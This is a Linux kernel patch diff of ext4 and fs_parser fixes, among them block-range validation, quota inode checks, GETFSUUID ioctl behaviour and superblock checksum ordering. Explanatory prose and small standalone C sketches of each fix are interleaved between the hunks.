++	[EXT4_FC_REASON_ENCRYPTED_FILENAME] = "Encrypted filename",
+ };
+ 
+ int ext4_fc_info_show(struct seq_file *seq, void *v)
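
The scan-time validation above moves from "the value must fit in the block"
to a per-tag length check. The same idea in standalone C — the tag numbers
and payload sizes below are made-up stand-ins for the real ext4 on-disk
values, kept only to show the shape of the check:

    #include <stdbool.h>
    #include <stddef.h>

    enum { TAG_PAD, TAG_HEAD, TAG_TAIL, TAG_DENTRY };

    /* Reject a TLV whose length is impossible for its tag, before the
     * payload is ever dereferenced. */
    static bool value_len_valid(int tag, size_t len)
    {
            switch (tag) {
            case TAG_PAD:
                    return true;                    /* padding: any length */
            case TAG_HEAD:
                    return len == 8;                /* fixed-size payload */
            case TAG_TAIL:
                    return len >= 8;                /* may carry extra data */
            case TAG_DENTRY:
                    return len >= 1 && len <= 255;  /* bounded name */
            }
            return false;                           /* unknown tag: reject */
    }
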
+diff --git a/fs/ext4/fast_commit.h b/fs/ext4/fast_commit.h
+index a6154c3ed1357..2fadb2c4780c8 100644
+--- a/fs/ext4/fast_commit.h
++++ b/fs/ext4/fast_commit.h
+@@ -58,7 +58,7 @@ struct ext4_fc_dentry_info {
+ 	__u8 fc_dname[];
+ };
+ 
+-/* Value structure for EXT4_FC_TAG_INODE and EXT4_FC_TAG_INODE_PARTIAL. */
++/* Value structure for EXT4_FC_TAG_INODE. */
+ struct ext4_fc_inode {
+ 	__le32 fc_ino;
+ 	__u8 fc_raw_inode[];
+@@ -96,6 +96,7 @@ enum {
+ 	EXT4_FC_REASON_RENAME_DIR,
+ 	EXT4_FC_REASON_FALLOC_RANGE,
+ 	EXT4_FC_REASON_INODE_JOURNAL_DATA,
++	EXT4_FC_REASON_ENCRYPTED_FILENAME,
+ 	EXT4_FC_REASON_MAX
+ };
+ 
+diff --git a/fs/ext4/indirect.c b/fs/ext4/indirect.c
+index 860fc51190098..c68bebe7ff4b6 100644
+--- a/fs/ext4/indirect.c
++++ b/fs/ext4/indirect.c
+@@ -148,6 +148,7 @@ static Indirect *ext4_get_branch(struct inode *inode, int depth,
+ 	struct super_block *sb = inode->i_sb;
+ 	Indirect *p = chain;
+ 	struct buffer_head *bh;
++	unsigned int key;
+ 	int ret = -EIO;
+ 
+ 	*err = 0;
+@@ -156,7 +157,13 @@ static Indirect *ext4_get_branch(struct inode *inode, int depth,
+ 	if (!p->key)
+ 		goto no_block;
+ 	while (--depth) {
+-		bh = sb_getblk(sb, le32_to_cpu(p->key));
++		key = le32_to_cpu(p->key);
++		if (key > ext4_blocks_count(EXT4_SB(sb)->s_es)) {
++			/* the block was out of range */
++			ret = -EFSCORRUPTED;
++			goto failure;
++		}
++		bh = sb_getblk(sb, key);
+ 		if (unlikely(!bh)) {
+ 			ret = -ENOMEM;
+ 			goto failure;
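
The indirect-block fix boils down to validating an on-disk block pointer
against the filesystem's size before handing it to sb_getblk(). As a
standalone sketch, with blocks_count standing in for ext4_blocks_count():

    #include <stdbool.h>
    #include <stdint.h>

    /* An on-disk block number is only usable if it lies inside the
     * device; anything past the end indicates corruption, not an I/O
     * error. Zero means "no block" and is handled by the caller. */
    static bool block_in_range(uint32_t key, uint64_t blocks_count)
    {
            return key != 0 && key <= blocks_count;
    }
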
+diff --git a/fs/ext4/inode.c b/fs/ext4/inode.c
+index 2b5ef1b642499..283afda26d9cb 100644
+--- a/fs/ext4/inode.c
++++ b/fs/ext4/inode.c
+@@ -222,13 +222,13 @@ void ext4_evict_inode(struct inode *inode)
+ 
+ 	/*
+ 	 * For inodes with journalled data, transaction commit could have
+-	 * dirtied the inode. Flush worker is ignoring it because of I_FREEING
+-	 * flag but we still need to remove the inode from the writeback lists.
++	 * dirtied the inode. And for inodes with dioread_nolock, unwritten
++	 * extents converting worker could merge extents and also have dirtied
++	 * the inode. Flush worker is ignoring it because of I_FREEING flag but
++	 * we still need to remove the inode from the writeback lists.
+ 	 */
+-	if (!list_empty_careful(&inode->i_io_list)) {
+-		WARN_ON_ONCE(!ext4_should_journal_data(inode));
++	if (!list_empty_careful(&inode->i_io_list))
+ 		inode_io_list_del(inode);
+-	}
+ 
+ 	/*
+ 	 * Protect us against freezing - iput() caller didn't have to have any
+@@ -335,6 +335,12 @@ stop_handle:
+ 	ext4_xattr_inode_array_free(ea_inode_array);
+ 	return;
+ no_delete:
++	/*
++	 * Check whether something else accidentally dirtied the evicting
++	 * inode, which may cause inode use-after-free issues later.
++	 */
++	WARN_ON_ONCE(!list_empty_careful(&inode->i_io_list));
++
+ 	if (!list_empty(&EXT4_I(inode)->i_fc_list))
+ 		ext4_fc_mark_ineligible(inode->i_sb, EXT4_FC_REASON_NOMEM, NULL);
+ 	ext4_clear_inode(inode);	/* We must guarantee clearing of inode... */
+@@ -1309,7 +1315,8 @@ static int ext4_write_end(struct file *file,
+ 
+ 	trace_ext4_write_end(inode, pos, len, copied);
+ 
+-	if (ext4_has_inline_data(inode))
++	if (ext4_has_inline_data(inode) &&
++	    ext4_test_inode_state(inode, EXT4_STATE_MAY_INLINE_DATA))
+ 		return ext4_write_inline_data_end(inode, pos, len, copied, page);
+ 
+ 	copied = block_write_end(file, mapping, pos, len, copied, page, fsdata);
+@@ -4225,7 +4232,8 @@ int ext4_truncate(struct inode *inode)
+ 
+ 	/* If we zero-out tail of the page, we have to create jinode for jbd2 */
+ 	if (inode->i_size & (inode->i_sb->s_blocksize - 1)) {
+-		if (ext4_inode_attach_jinode(inode) < 0)
++		err = ext4_inode_attach_jinode(inode);
++		if (err)
+ 			goto out_trace;
+ 	}
+ 
+@@ -4473,9 +4481,17 @@ static int __ext4_get_inode_loc(struct super_block *sb, unsigned long ino,
+ 	inodes_per_block = EXT4_SB(sb)->s_inodes_per_block;
+ 	inode_offset = ((ino - 1) %
+ 			EXT4_INODES_PER_GROUP(sb));
+-	block = ext4_inode_table(sb, gdp) + (inode_offset / inodes_per_block);
+ 	iloc->offset = (inode_offset % inodes_per_block) * EXT4_INODE_SIZE(sb);
+ 
++	block = ext4_inode_table(sb, gdp);
++	if ((block <= le32_to_cpu(EXT4_SB(sb)->s_es->s_first_data_block)) ||
++	    (block >= ext4_blocks_count(EXT4_SB(sb)->s_es))) {
++		ext4_error(sb, "Invalid inode table block %llu in "
++			   "block_group %u", block, iloc->block_group);
++		return -EFSCORRUPTED;
++	}
++	block += (inode_offset / inodes_per_block);
++
+ 	bh = sb_getblk(sb, block);
+ 	if (unlikely(!bh))
+ 		return -ENOMEM;
+@@ -5044,8 +5060,14 @@ struct inode *__ext4_iget(struct super_block *sb, unsigned long ino,
+ 	if (IS_CASEFOLDED(inode) && !ext4_has_feature_casefold(inode->i_sb))
+ 		ext4_error_inode(inode, function, line, 0,
+ 				 "casefold flag without casefold feature");
+-	brelse(iloc.bh);
++	if (is_bad_inode(inode) && !(flags & EXT4_IGET_BAD)) {
++		ext4_error_inode(inode, function, line, 0,
++				 "bad inode without EXT4_IGET_BAD flag");
++		ret = -EUCLEAN;
++		goto bad_inode;
++	}
+ 
++	brelse(iloc.bh);
+ 	unlock_new_inode(inode);
+ 	return inode;
+ 
+@@ -5853,6 +5875,14 @@ static int __ext4_expand_extra_isize(struct inode *inode,
+ 		return 0;
+ 	}
+ 
++	/*
++	 * We may need to allocate external xattr block so we need quotas
++	 * initialized. Here we can be called with various locks held so we
++	 * cannot afford to initialize quotas ourselves. So just bail.
++	 */
++	if (dquot_initialize_needed(inode))
++		return -EAGAIN;
++
+ 	/* try to expand with EAs present */
+ 	error = ext4_expand_extra_isize_ea(inode, new_extra_isize,
+ 					   raw_inode, handle);
+diff --git a/fs/ext4/ioctl.c b/fs/ext4/ioctl.c
+index 95dfea28bf4e9..8067ccda34e45 100644
+--- a/fs/ext4/ioctl.c
++++ b/fs/ext4/ioctl.c
+@@ -374,7 +374,8 @@ static long swap_inode_boot_loader(struct super_block *sb,
+ 	blkcnt_t blocks;
+ 	unsigned short bytes;
+ 
+-	inode_bl = ext4_iget(sb, EXT4_BOOT_LOADER_INO, EXT4_IGET_SPECIAL);
++	inode_bl = ext4_iget(sb, EXT4_BOOT_LOADER_INO,
++			EXT4_IGET_SPECIAL | EXT4_IGET_BAD);
+ 	if (IS_ERR(inode_bl))
+ 		return PTR_ERR(inode_bl);
+ 	ei_bl = EXT4_I(inode_bl);
+@@ -424,7 +425,7 @@ static long swap_inode_boot_loader(struct super_block *sb,
+ 	/* Protect extent tree against block allocations via delalloc */
+ 	ext4_double_down_write_data_sem(inode, inode_bl);
+ 
+-	if (inode_bl->i_nlink == 0) {
++	if (is_bad_inode(inode_bl) || !S_ISREG(inode_bl->i_mode)) {
+ 		/* this inode has never been used as a BOOT_LOADER */
+ 		set_nlink(inode_bl, 1);
+ 		i_uid_write(inode_bl, 0);
+@@ -731,6 +732,10 @@ static int ext4_ioctl_setproject(struct inode *inode, __u32 projid)
+ 	if (ext4_is_quota_file(inode))
+ 		return err;
+ 
++	err = dquot_initialize(inode);
++	if (err)
++		return err;
++
+ 	err = ext4_get_inode_loc(inode, &iloc);
+ 	if (err)
+ 		return err;
+@@ -746,10 +751,6 @@ static int ext4_ioctl_setproject(struct inode *inode, __u32 projid)
+ 		brelse(iloc.bh);
+ 	}
+ 
+-	err = dquot_initialize(inode);
+-	if (err)
+-		return err;
+-
+ 	handle = ext4_journal_start(inode, EXT4_HT_QUOTA,
+ 		EXT4_QUOTA_INIT_BLOCKS(sb) +
+ 		EXT4_QUOTA_DEL_BLOCKS(sb) + 3);
+@@ -1153,19 +1154,22 @@ static int ext4_ioctl_getuuid(struct ext4_sb_info *sbi,
+ 
+ 	if (fsuuid.fsu_len == 0) {
+ 		fsuuid.fsu_len = UUID_SIZE;
+-		if (copy_to_user(ufsuuid, &fsuuid, sizeof(fsuuid.fsu_len)))
++		if (copy_to_user(&ufsuuid->fsu_len, &fsuuid.fsu_len,
++					sizeof(fsuuid.fsu_len)))
+ 			return -EFAULT;
+-		return -EINVAL;
++		return 0;
+ 	}
+ 
+-	if (fsuuid.fsu_len != UUID_SIZE || fsuuid.fsu_flags != 0)
++	if (fsuuid.fsu_len < UUID_SIZE || fsuuid.fsu_flags != 0)
+ 		return -EINVAL;
+ 
+ 	lock_buffer(sbi->s_sbh);
+ 	memcpy(uuid, sbi->s_es->s_uuid, UUID_SIZE);
+ 	unlock_buffer(sbi->s_sbh);
+ 
+-	if (copy_to_user(&ufsuuid->fsu_uuid[0], uuid, UUID_SIZE))
++	fsuuid.fsu_len = UUID_SIZE;
++	if (copy_to_user(ufsuuid, &fsuuid, sizeof(fsuuid)) ||
++	    copy_to_user(&ufsuuid->fsu_uuid[0], uuid, UUID_SIZE))
+ 		return -EFAULT;
+ 	return 0;
+ }
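
After this fix, EXT4_IOC_GETFSUUID follows the usual two-call convention: a
query with fsu_len == 0 succeeds (instead of failing with EINVAL) after
filling in the required length, and any buffer of at least UUID_SIZE is
accepted. A hedged userspace sketch — the struct layout and ioctl number
are mirrored here as an assumption, since they may not be in your exported
headers; verify against the kernel's ext4 definitions before relying on them:

    #include <linux/types.h>
    #include <stdio.h>
    #include <stdlib.h>
    #include <sys/ioctl.h>

    /* Assumed to match fs/ext4/ext4.h; check your kernel's headers. */
    struct fsuuid {
            __u32 fsu_len;
            __u32 fsu_flags;
            __u8  fsu_uuid[];
    };
    #define EXT4_IOC_GETFSUUID _IOR('f', 44, struct fsuuid)

    static int print_fs_uuid(int fd)
    {
            struct fsuuid probe = { .fsu_len = 0 };
            struct fsuuid *arg;
            __u32 i;

            /* call 1: fsu_len == 0 now returns 0 and reports the size */
            if (ioctl(fd, EXT4_IOC_GETFSUUID, &probe))
                    return -1;

            arg = calloc(1, sizeof(*arg) + probe.fsu_len);
            if (!arg)
                    return -1;
            arg->fsu_len = probe.fsu_len;

            /* call 2: fetch the UUID itself */
            if (ioctl(fd, EXT4_IOC_GETFSUUID, arg) == 0) {
                    for (i = 0; i < arg->fsu_len; i++)
                            printf("%02x", arg->fsu_uuid[i]);
                    printf("\n");
            }
            free(arg);
            return 0;
    }
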
+diff --git a/fs/ext4/namei.c b/fs/ext4/namei.c
+index c08c0aba18836..1c5518a4bdf91 100644
+--- a/fs/ext4/namei.c
++++ b/fs/ext4/namei.c
+@@ -3204,14 +3204,20 @@ end_rmdir:
+ 	return retval;
+ }
+ 
+-int __ext4_unlink(handle_t *handle, struct inode *dir, const struct qstr *d_name,
+-		  struct inode *inode)
++int __ext4_unlink(struct inode *dir, const struct qstr *d_name,
++		  struct inode *inode,
++		  struct dentry *dentry /* NULL during fast_commit recovery */)
+ {
+ 	int retval = -ENOENT;
+ 	struct buffer_head *bh;
+ 	struct ext4_dir_entry_2 *de;
++	handle_t *handle;
+ 	int skip_remove_dentry = 0;
+ 
++	/*
++	 * Keep this outside the transaction; it may have to set up the
++	 * directory's encryption key, which isn't GFP_NOFS-safe.
++	 */
+ 	bh = ext4_find_entry(dir, d_name, &de, NULL);
+ 	if (IS_ERR(bh))
+ 		return PTR_ERR(bh);
+@@ -3228,7 +3234,14 @@ int __ext4_unlink(handle_t *handle, struct inode *dir, const struct qstr *d_name
+ 		if (EXT4_SB(inode->i_sb)->s_mount_state & EXT4_FC_REPLAY)
+ 			skip_remove_dentry = 1;
+ 		else
+-			goto out;
++			goto out_bh;
++	}
++
++	handle = ext4_journal_start(dir, EXT4_HT_DIR,
++				    EXT4_DATA_TRANS_BLOCKS(dir->i_sb));
++	if (IS_ERR(handle)) {
++		retval = PTR_ERR(handle);
++		goto out_bh;
+ 	}
+ 
+ 	if (IS_DIRSYNC(dir))
+@@ -3237,12 +3250,12 @@ int __ext4_unlink(handle_t *handle, struct inode *dir, const struct qstr *d_name
+ 	if (!skip_remove_dentry) {
+ 		retval = ext4_delete_entry(handle, dir, de, bh);
+ 		if (retval)
+-			goto out;
++			goto out_handle;
+ 		dir->i_ctime = dir->i_mtime = current_time(dir);
+ 		ext4_update_dx_flag(dir);
+ 		retval = ext4_mark_inode_dirty(handle, dir);
+ 		if (retval)
+-			goto out;
++			goto out_handle;
+ 	} else {
+ 		retval = 0;
+ 	}
+@@ -3255,15 +3268,17 @@ int __ext4_unlink(handle_t *handle, struct inode *dir, const struct qstr *d_name
+ 		ext4_orphan_add(handle, inode);
+ 	inode->i_ctime = current_time(inode);
+ 	retval = ext4_mark_inode_dirty(handle, inode);
+-
+-out:
++	if (dentry && !retval)
++		ext4_fc_track_unlink(handle, dentry);
++out_handle:
++	ext4_journal_stop(handle);
++out_bh:
+ 	brelse(bh);
+ 	return retval;
+ }
+ 
+ static int ext4_unlink(struct inode *dir, struct dentry *dentry)
+ {
+-	handle_t *handle;
+ 	int retval;
+ 
+ 	if (unlikely(ext4_forced_shutdown(EXT4_SB(dir->i_sb))))
+@@ -3281,16 +3296,7 @@ static int ext4_unlink(struct inode *dir, struct dentry *dentry)
+ 	if (retval)
+ 		goto out_trace;
+ 
+-	handle = ext4_journal_start(dir, EXT4_HT_DIR,
+-				    EXT4_DATA_TRANS_BLOCKS(dir->i_sb));
+-	if (IS_ERR(handle)) {
+-		retval = PTR_ERR(handle);
+-		goto out_trace;
+-	}
+-
+-	retval = __ext4_unlink(handle, dir, &dentry->d_name, d_inode(dentry));
+-	if (!retval)
+-		ext4_fc_track_unlink(handle, dentry);
++	retval = __ext4_unlink(dir, &dentry->d_name, d_inode(dentry), dentry);
+ #if IS_ENABLED(CONFIG_UNICODE)
+ 	/* VFS negative dentries are incompatible with Encoding and
+ 	 * Case-insensitiveness. Eventually we'll want avoid
+@@ -3301,8 +3307,6 @@ static int ext4_unlink(struct inode *dir, struct dentry *dentry)
+ 	if (IS_CASEFOLDED(dir))
+ 		d_invalidate(dentry);
+ #endif
+-	if (handle)
+-		ext4_journal_stop(handle);
+ 
+ out_trace:
+ 	trace_ext4_unlink_exit(dentry, retval);
+@@ -3792,6 +3796,9 @@ static int ext4_rename(struct user_namespace *mnt_userns, struct inode *old_dir,
+ 		return -EXDEV;
+ 
+ 	retval = dquot_initialize(old.dir);
++	if (retval)
++		return retval;
++	retval = dquot_initialize(old.inode);
+ 	if (retval)
+ 		return retval;
+ 	retval = dquot_initialize(new.dir);
+diff --git a/fs/ext4/orphan.c b/fs/ext4/orphan.c
+index 69a9cf9137a61..e5b47dda33175 100644
+--- a/fs/ext4/orphan.c
++++ b/fs/ext4/orphan.c
+@@ -412,7 +412,7 @@ void ext4_orphan_cleanup(struct super_block *sb, struct ext4_super_block *es)
+ 		/* don't clear list on RO mount w/ errors */
+ 		if (es->s_last_orphan && !(s_flags & SB_RDONLY)) {
+ 			ext4_msg(sb, KERN_INFO, "Errors on filesystem, "
+-				  "clearing orphan list.\n");
++				  "clearing orphan list.");
+ 			es->s_last_orphan = 0;
+ 		}
+ 		ext4_debug("Skipping orphan recovery on fs with errors.\n");
+diff --git a/fs/ext4/resize.c b/fs/ext4/resize.c
+index 46b87ffeb3045..b493233750ab2 100644
+--- a/fs/ext4/resize.c
++++ b/fs/ext4/resize.c
+@@ -1110,6 +1110,16 @@ exit_free:
+ 	return err;
+ }
+ 
++static inline void ext4_set_block_group_nr(struct super_block *sb, char *data,
++					   ext4_group_t group)
++{
++	struct ext4_super_block *es = (struct ext4_super_block *) data;
++
++	es->s_block_group_nr = cpu_to_le16(group);
++	if (ext4_has_metadata_csum(sb))
++		es->s_checksum = ext4_superblock_csum(sb, es);
++}
++
+ /*
+  * Update the backup copies of the ext4 metadata.  These don't need to be part
+  * of the main resize transaction, because e2fsck will re-write them if there
+@@ -1158,7 +1168,8 @@ static void update_backups(struct super_block *sb, sector_t blk_off, char *data,
+ 	while (group < sbi->s_groups_count) {
+ 		struct buffer_head *bh;
+ 		ext4_fsblk_t backup_block;
+-		struct ext4_super_block *es;
++		int has_super = ext4_bg_has_super(sb, group);
++		ext4_fsblk_t first_block = ext4_group_first_block_no(sb, group);
+ 
+ 		/* Out of journal space, and can't get more - abort - so sad */
+ 		err = ext4_resize_ensure_credits_batch(handle, 1);
+@@ -1168,8 +1179,7 @@ static void update_backups(struct super_block *sb, sector_t blk_off, char *data,
+ 		if (meta_bg == 0)
+ 			backup_block = ((ext4_fsblk_t)group) * bpg + blk_off;
+ 		else
+-			backup_block = (ext4_group_first_block_no(sb, group) +
+-					ext4_bg_has_super(sb, group));
++			backup_block = first_block + has_super;
+ 
+ 		bh = sb_getblk(sb, backup_block);
+ 		if (unlikely(!bh)) {
+@@ -1187,10 +1197,8 @@ static void update_backups(struct super_block *sb, sector_t blk_off, char *data,
+ 		memcpy(bh->b_data, data, size);
+ 		if (rest)
+ 			memset(bh->b_data + size, 0, rest);
+-		es = (struct ext4_super_block *) bh->b_data;
+-		es->s_block_group_nr = cpu_to_le16(group);
+-		if (ext4_has_metadata_csum(sb))
+-			es->s_checksum = ext4_superblock_csum(sb, es);
++		if (has_super && (backup_block == first_block))
++			ext4_set_block_group_nr(sb, bh->b_data, group);
+ 		set_buffer_uptodate(bh);
+ 		unlock_buffer(bh);
+ 		err = ext4_handle_dirty_metadata(handle, NULL, bh);
+@@ -1476,8 +1484,6 @@ static void ext4_update_super(struct super_block *sb,
+ 	 * active. */
+ 	ext4_r_blocks_count_set(es, ext4_r_blocks_count(es) +
+ 				reserved_blocks);
+-	ext4_superblock_csum_set(sb);
+-	unlock_buffer(sbi->s_sbh);
+ 
+ 	/* Update the free space counts */
+ 	percpu_counter_add(&sbi->s_freeclusters_counter,
+@@ -1513,6 +1519,8 @@ static void ext4_update_super(struct super_block *sb,
+ 		ext4_calculate_overhead(sb);
+ 	es->s_overhead_clusters = cpu_to_le32(sbi->s_overhead);
+ 
++	ext4_superblock_csum_set(sb);
++	unlock_buffer(sbi->s_sbh);
+ 	if (test_opt(sb, DEBUG))
+ 		printk(KERN_DEBUG "EXT4-fs: added group %u:"
+ 		       "%llu blocks(%llu free %llu reserved)\n", flex_gd->count,
+@@ -1596,8 +1604,8 @@ exit_journal:
+ 		int meta_bg = ext4_has_feature_meta_bg(sb);
+ 		sector_t old_gdb = 0;
+ 
+-		update_backups(sb, sbi->s_sbh->b_blocknr, (char *)es,
+-			       sizeof(struct ext4_super_block), 0);
++		update_backups(sb, ext4_group_first_block_no(sb, 0),
++			       (char *)es, sizeof(struct ext4_super_block), 0);
+ 		for (; gdb_num <= gdb_num_end; gdb_num++) {
+ 			struct buffer_head *gdb_bh;
+ 
+@@ -1808,7 +1816,7 @@ errout:
+ 		if (test_opt(sb, DEBUG))
+ 			printk(KERN_DEBUG "EXT4-fs: extended group to %llu "
+ 			       "blocks\n", ext4_blocks_count(es));
+-		update_backups(sb, EXT4_SB(sb)->s_sbh->b_blocknr,
++		update_backups(sb, ext4_group_first_block_no(sb, 0),
+ 			       (char *)es, sizeof(struct ext4_super_block), 0);
+ 	}
+ 	return err;
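
The resize fix also reorders the superblock update so the checksum is
recomputed after every field write and only then is the buffer lock dropped,
so no reader sees fields newer than the checksum covering them. The invariant
in a small pthread sketch — the fields and checksum are toys, not ext4's:

    #include <pthread.h>
    #include <stdint.h>

    struct sb {
            pthread_mutex_t lock;
            uint64_t free_blocks;
            uint64_t reserved_blocks;
            uint32_t checksum;
    };

    /* toy checksum over the protected fields */
    static uint32_t csum(const struct sb *s)
    {
            return (uint32_t)(s->free_blocks * 2654435761u
                              ^ s->reserved_blocks);
    }

    static void update_sb(struct sb *s, uint64_t freed, uint64_t reserved)
    {
            pthread_mutex_lock(&s->lock);
            s->free_blocks += freed;
            s->reserved_blocks += reserved;
            s->checksum = csum(s);          /* covers *all* updates above */
            pthread_mutex_unlock(&s->lock); /* unlock after the checksum */
    }
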
+diff --git a/fs/ext4/super.c b/fs/ext4/super.c
+index 7cdd2138c8972..aa4f65663fad8 100644
+--- a/fs/ext4/super.c
++++ b/fs/ext4/super.c
+@@ -1323,6 +1323,7 @@ static struct inode *ext4_alloc_inode(struct super_block *sb)
+ 		return NULL;
+ 
+ 	inode_set_iversion(&ei->vfs_inode, 1);
++	ei->i_flags = 0;
+ 	spin_lock_init(&ei->i_raw_lock);
+ 	INIT_LIST_HEAD(&ei->i_prealloc_list);
+ 	atomic_set(&ei->i_prealloc_active, 0);
+@@ -2247,7 +2248,7 @@ static int ext4_parse_param(struct fs_context *fc, struct fs_parameter *param)
+ 			return -EINVAL;
+ 		}
+ 
+-		error = fs_lookup_param(fc, param, 1, &path);
++		error = fs_lookup_param(fc, param, 1, LOOKUP_FOLLOW, &path);
+ 		if (error) {
+ 			ext4_msg(NULL, KERN_ERR, "error: could not find "
+ 				 "journal device path");
+@@ -5287,14 +5288,15 @@ static int __ext4_fill_super(struct fs_context *fc, struct super_block *sb)
+ 		goto failed_mount3a;
+ 	} else {
+ 		/* Nojournal mode, all journal mount options are illegal */
+-		if (test_opt2(sb, EXPLICIT_JOURNAL_CHECKSUM)) {
++		if (test_opt(sb, JOURNAL_ASYNC_COMMIT)) {
+ 			ext4_msg(sb, KERN_ERR, "can't mount with "
+-				 "journal_checksum, fs mounted w/o journal");
++				 "journal_async_commit, fs mounted w/o journal");
+ 			goto failed_mount3a;
+ 		}
+-		if (test_opt(sb, JOURNAL_ASYNC_COMMIT)) {
++
++		if (test_opt2(sb, EXPLICIT_JOURNAL_CHECKSUM)) {
+ 			ext4_msg(sb, KERN_ERR, "can't mount with "
+-				 "journal_async_commit, fs mounted w/o journal");
++				 "journal_checksum, fs mounted w/o journal");
+ 			goto failed_mount3a;
+ 		}
+ 		if (sbi->s_commit_interval != JBD2_DEFAULT_MAX_COMMIT_AGE*HZ) {
+@@ -5723,7 +5725,7 @@ static struct inode *ext4_get_journal_inode(struct super_block *sb,
+ 
+ 	ext4_debug("Journal inode found at %p: %lld bytes\n",
+ 		  journal_inode, journal_inode->i_size);
+-	if (!S_ISREG(journal_inode->i_mode)) {
++	if (!S_ISREG(journal_inode->i_mode) || IS_ENCRYPTED(journal_inode)) {
+ 		ext4_msg(sb, KERN_ERR, "invalid journal inode");
+ 		iput(journal_inode);
+ 		return NULL;
+@@ -6886,6 +6888,20 @@ static int ext4_quota_on(struct super_block *sb, int type, int format_id,
+ 	return err;
+ }
+ 
++static inline bool ext4_check_quota_inum(int type, unsigned long qf_inum)
++{
++	switch (type) {
++	case USRQUOTA:
++		return qf_inum == EXT4_USR_QUOTA_INO;
++	case GRPQUOTA:
++		return qf_inum == EXT4_GRP_QUOTA_INO;
++	case PRJQUOTA:
++		return qf_inum >= EXT4_GOOD_OLD_FIRST_INO;
++	default:
++		BUG();
++	}
++}
++
+ static int ext4_quota_enable(struct super_block *sb, int type, int format_id,
+ 			     unsigned int flags)
+ {
+@@ -6902,9 +6918,16 @@ static int ext4_quota_enable(struct super_block *sb, int type, int format_id,
+ 	if (!qf_inums[type])
+ 		return -EPERM;
+ 
++	if (!ext4_check_quota_inum(type, qf_inums[type])) {
++		ext4_error(sb, "Bad quota inum: %lu, type: %d",
++				qf_inums[type], type);
++		return -EUCLEAN;
++	}
++
+ 	qf_inode = ext4_iget(sb, qf_inums[type], EXT4_IGET_SPECIAL);
+ 	if (IS_ERR(qf_inode)) {
+-		ext4_error(sb, "Bad quota inode # %lu", qf_inums[type]);
++		ext4_error(sb, "Bad quota inode: %lu, type: %d",
++				qf_inums[type], type);
+ 		return PTR_ERR(qf_inode);
+ 	}
+ 
+@@ -6943,8 +6966,9 @@ int ext4_enable_quotas(struct super_block *sb)
+ 			if (err) {
+ 				ext4_warning(sb,
+ 					"Failed to enable quota tracking "
+-					"(type=%d, err=%d). Please run "
+-					"e2fsck to fix.", type, err);
++					"(type=%d, err=%d, ino=%lu). "
++					"Please run e2fsck to fix.", type,
++					err, qf_inums[type]);
+ 				for (type--; type >= 0; type--) {
+ 					struct inode *inode;
+ 
+diff --git a/fs/ext4/verity.c b/fs/ext4/verity.c
+index 3c640bd7ecaeb..30e3b65798b50 100644
+--- a/fs/ext4/verity.c
++++ b/fs/ext4/verity.c
+@@ -79,7 +79,7 @@ static int pagecache_write(struct inode *inode, const void *buf, size_t count,
+ 		size_t n = min_t(size_t, count,
+ 				 PAGE_SIZE - offset_in_page(pos));
+ 		struct page *page;
+-		void *fsdata;
++		void *fsdata = NULL;
+ 		int res;
+ 
+ 		res = aops->write_begin(NULL, mapping, pos, n, &page, &fsdata);
+diff --git a/fs/ext4/xattr.c b/fs/ext4/xattr.c
+index 36d6ba7190b6d..866772a2e068f 100644
+--- a/fs/ext4/xattr.c
++++ b/fs/ext4/xattr.c
+@@ -1281,7 +1281,7 @@ retry_ref:
+ 				ce = mb_cache_entry_get(ea_block_cache, hash,
+ 							bh->b_blocknr);
+ 				if (ce) {
+-					ce->e_reusable = 1;
++					set_bit(MBE_REUSABLE_B, &ce->e_flags);
+ 					mb_cache_entry_put(ea_block_cache, ce);
+ 				}
+ 			}
+@@ -1441,6 +1441,9 @@ static struct inode *ext4_xattr_inode_create(handle_t *handle,
+ 		if (!err)
+ 			err = ext4_inode_attach_jinode(ea_inode);
+ 		if (err) {
++			if (ext4_xattr_inode_dec_ref(handle, ea_inode))
++				ext4_warning_inode(ea_inode,
++					"cleanup dec ref error %d", err);
+ 			iput(ea_inode);
+ 			return ERR_PTR(err);
+ 		}
+@@ -2042,7 +2045,7 @@ inserted:
+ 				}
+ 				BHDR(new_bh)->h_refcount = cpu_to_le32(ref);
+ 				if (ref == EXT4_XATTR_REFCOUNT_MAX)
+-					ce->e_reusable = 0;
++					clear_bit(MBE_REUSABLE_B, &ce->e_flags);
+ 				ea_bdebug(new_bh, "reusing; refcount now=%d",
+ 					  ref);
+ 				ext4_xattr_block_csum_set(inode, new_bh);
+@@ -2070,19 +2073,11 @@ inserted:
+ 
+ 			goal = ext4_group_first_block_no(sb,
+ 						EXT4_I(inode)->i_block_group);
+-
+-			/* non-extent files can't have physical blocks past 2^32 */
+-			if (!(ext4_test_inode_flag(inode, EXT4_INODE_EXTENTS)))
+-				goal = goal & EXT4_MAX_BLOCK_FILE_PHYS;
+-
+ 			block = ext4_new_meta_blocks(handle, inode, goal, 0,
+ 						     NULL, &error);
+ 			if (error)
+ 				goto cleanup;
+ 
+-			if (!(ext4_test_inode_flag(inode, EXT4_INODE_EXTENTS)))
+-				BUG_ON(block > EXT4_MAX_BLOCK_FILE_PHYS);
+-
+ 			ea_idebug(inode, "creating block %llu",
+ 				  (unsigned long long)block);
+ 
+@@ -2555,7 +2550,7 @@ static int ext4_xattr_move_to_block(handle_t *handle, struct inode *inode,
+ 
+ 	is = kzalloc(sizeof(struct ext4_xattr_ibody_find), GFP_NOFS);
+ 	bs = kzalloc(sizeof(struct ext4_xattr_block_find), GFP_NOFS);
+-	buffer = kmalloc(value_size, GFP_NOFS);
++	buffer = kvmalloc(value_size, GFP_NOFS);
+ 	b_entry_name = kmalloc(entry->e_name_len + 1, GFP_NOFS);
+ 	if (!is || !bs || !buffer || !b_entry_name) {
+ 		error = -ENOMEM;
+@@ -2607,7 +2602,7 @@ static int ext4_xattr_move_to_block(handle_t *handle, struct inode *inode,
+ 	error = 0;
+ out:
+ 	kfree(b_entry_name);
+-	kfree(buffer);
++	kvfree(buffer);
+ 	if (is)
+ 		brelse(is->iloc.bh);
+ 	if (bs)
+diff --git a/fs/fs_parser.c b/fs/fs_parser.c
+index ed40ce5742fda..edb3712dcfa58 100644
+--- a/fs/fs_parser.c
++++ b/fs/fs_parser.c
+@@ -138,15 +138,16 @@ EXPORT_SYMBOL(__fs_parse);
+  * @fc: The filesystem context to log errors through.
+  * @param: The parameter.
+  * @want_bdev: T if want a blockdev
++ * @flags: Pathwalk flags passed to filename_lookup()
+  * @_path: The result of the lookup
+  */
+ int fs_lookup_param(struct fs_context *fc,
+ 		    struct fs_parameter *param,
+ 		    bool want_bdev,
++		    unsigned int flags,
+ 		    struct path *_path)
+ {
+ 	struct filename *f;
+-	unsigned int flags = 0;
+ 	bool put_f;
